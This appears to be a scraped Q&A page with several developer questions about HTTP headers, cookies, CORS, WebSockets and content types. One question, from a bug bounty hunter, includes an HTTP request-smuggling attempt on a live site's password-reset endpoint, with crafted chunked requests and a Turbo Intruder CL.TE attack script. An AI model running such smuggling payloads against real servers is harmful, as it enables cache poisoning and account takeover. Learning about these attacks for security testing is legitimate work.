NodeJS: Why is my POST request not working? - node.js

I'm trying to use the net module in nodejs to send a POST request while connecting to a socket.
I've tried sending a GET request which indeed does work, but I can't seem to get the POST request to work.
This is the code:
socket.write(`POST /page.php HTTP/1.1\r\n
Host: domain.com\r\n
Connection: close\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\r\n
User-Agent: Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13\r\n
Upgrade-Insecure-Requests: 1\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: en-US,en;q=0.9\r\n
Cache-Control: max-age=0\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 0\r\n\r\n`);
I've "debugged" it, and I've noticed some 301 Moved Permanently and Temporarily redirected responses from the host.

Related

Azure APIM throws error for WebSocket API due to Connection: Keep-Alive,Upgrade

I have REST and WebSocket APIs on the Azure API Management services portal. WebSocket is redirecting to different Web Pubsub service based on input parameters from clients/frontend for different development environments.
When hitting WebSocket api from Google Chrome, I am able to successfully establish connection end-to-end.
When hitting same WebSocket api from Firefox, I am getting InvalidWebsocketUpgrade error from APIM service.
This happens because Chrome is sending Connection: Upgrade in the socket connection request header, while Firefox is sending Connection: Keep-Alive, Upgrade in the header.
Chrome Request:
GET wss://apim-test.azure-api.net/qa/socket?access_token=eyJhbGc HTTP/1.1
Host: apim-ecv.azure-api.net
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Upgrade: websocket
Origin: https://abc.xyz.com
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Sec-WebSocket-Key: GTWCGvTFJN82sAl8gVv+VA==
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Sec-WebSocket-Protocol: json.webpubsub.azure.v1
Firefox request:
GET wss://apim-test.azure-api.net/qa/socket?access_token=eyJhbGciOi HTTP/1.1
Host: apim-ecv.azure-api.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: https://az-qa2.ecarevault.com
Sec-WebSocket-Protocol: json.webpubsub.azure.v1
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: r764n2hSpKKr0Y63z1Ok3A==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
Do I need to configure anything to support this on APIM or anywhere else??
Glad that you got the Solution in Microsoft Q&A. Posting the suggestions over here to help the other community members as this is a feature request and would be helpful for the members with related discussions.
According to this document in the connection header, you need to use only Upgrade because it is a WebSocket protocol and as of now APIM is enabled only with Upgrade as a value of connection header and MS is working on enabling keep-alive, Upgrade values this could be a feature request.

Browser is not adding cookie on some requests

We are running an application (local app) inside another application (moodle) as a plugin.
What happens is when our app tries to access the backend graphql it doesn't add the cookies but the cookie is available on document.cookie before the request is sent. Also before the app is opened in the iFrame there are few requests made from moodle to backend server and the browser adds the cookie to those request.
Following are the request headers
moodle -> backend
Host: graphql.app.home
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: https://moodle.home:8443/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: cb_ltiid=s%3AF0FJpsc8bVe9ZqyLzgNgK7flKfGf4W7u.2GL43c7XLV11BzHXCS%2B7AvQKBAS9xg%2BNc7gaj264%2Bks
app (from moodle iFrame) -> backend
Host: graphql.app.home
Connection: keep-alive
Content-Length: 118
Pragma: no-cache
Cache-Control: no-cache
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
content-type: application/json
Origin: https://app.home
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.home/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Thanks for help
It was issue with fetch not sending the header because of
fetch won’t send cookies, unless you set the credentials init option.
(Since Aug 25, 2017. The spec changed the default credentials policy
to same-origin. Firefox changed since 61.0b13.)
solution was to pass credentials: 'include' to fetch options

Understanding reason for 403 Forbidden error

I'm trying to run a web application that I've built in an iframe on another domain. I'm able to load the page within the iframe, but any ajax requests on the page result in a 403 error as per below:
Request URL: https://test.mydomain.com/get_extra_services/
Request Method: POST
Status Code: 403 Forbidden
Remote Address: 207.38.86.14:443
Referrer Policy: no-referrer-when-downgrade
Connection: keep-alive
Content-Length: 1382
Content-Type: text/html
Date: Thu, 18 Jun 2020 22:57:41 GMT
Server: nginx
X-Content-Type-Options: nosniff
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Content-Length: 22
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: _ga=GA1.2.2146753382.1592180975; _gid=GA1.2.1219012919.1592286837
DNT: 1
Host: test.mydomain.com
Origin: https://test.mydomain.com
Referer: https://test.mydomain.com/order/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
X-CSRFToken: null
X-Requested-With: XMLHttpRequest
serviceid: 18
checked: 1
Any thoughts on what is causing this error?
Thanks!
You need to setup CORS to make requests from a different domain.
https://enable-cors.org/

Strange response when using Turbo Intruder

I'm a bug bounty hunter and just new to it. Few days ago, I read about the request smuggling vulnerability. And just after that, I started to find it on the Internet. Yesterday, I found a website that when I add X-Forwarded-Host: google.com to the header, it redirected me to https://www.google.com. It's very hard to exploit this so I have think about combine it with request smuggling. I choose the change password request as the target:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
I convert it to chunked:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
But when I sent it, it gave me the 503 client read error code. Look like it doesn't accept chunked. But, I still want to continue, so I download HTTP Request Smuggler and Turbo Intruder extensions on Burp Suite. Then I do Smuggle attack (CL.TE). It give a smuggle attack python code:
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
# This will prefix the victim's request. Edit it to achieve the desired effect.
prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''
# The request engine will auto-fix the content-length for us
attack = target.req + prefix
engine.queue(attack)
victim = target.req
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
Then I run it using Turbo Intruder. And I was very surprise, it sent 14 requests but just 12 requests are 503 and 2 left are 200. Special, in the 200 response header, it has ...transfer-encoding: chunked.... I have tried few times and it just gave the same result: 1 or 2 requests are 200. But something strange here, in the code, it's ...prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''.... After few tests I think that it's not the request smuggling bug because the response shown that it is the response of the original request, not the prefix in the code (I have tried to change the prefix too and it's still 200, not 400, 404, ... like I expect).
So is there anyone(must be a very professional hacker) know what vulnerability am I facing? Thank you!
First of all, your first converted reuest in chunked in TE;CL but after using burp extension you found its CL;TE, so the problem may be there.
As with responses you are a bit confused, i recommend you to solve portswigger http request smuggling labs as i have completed that recently by which your fundamentals will get pretty strong!

ERR_INVALID_SIGNED_EXCHANGE error in Google Chrome

I've set up my simple website with valid Let's Encrypt SSL certificate (from certbot). My nginx config is very short and trivial.
Website shows up correctly in latest Firefox. It shows 404 page, which is OK to me and should work as expected: 404 page.
If I try Google Chrome, i get an error:
The webpage at https://example.org/ might be temporarily down or it
may have moved permanently to a new web address.
ERR_INVALID_SIGNED_EXCHANGE
I assume that the application/signed-exchange header may cause this.
What is this header and should i remove it from response?
Request
GET / HTTP/1.1
Host: example.org
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,ru;q=0.8
DNT: 1
example.org example.org
Response
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 29 Mar 2019 12:05:49 GMT
Content-Type: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Content-Length: 345
Connection: keep-alive
What to fix?
The Content-Type in the response is incorrect. It should be a single type, as Steffen Ullrich said. For a 404 page, I suspect you want Content-Type: text/html.
This may be something particular to your nginx config. On my server, 404 pages have Content-Type: text/html.

Resources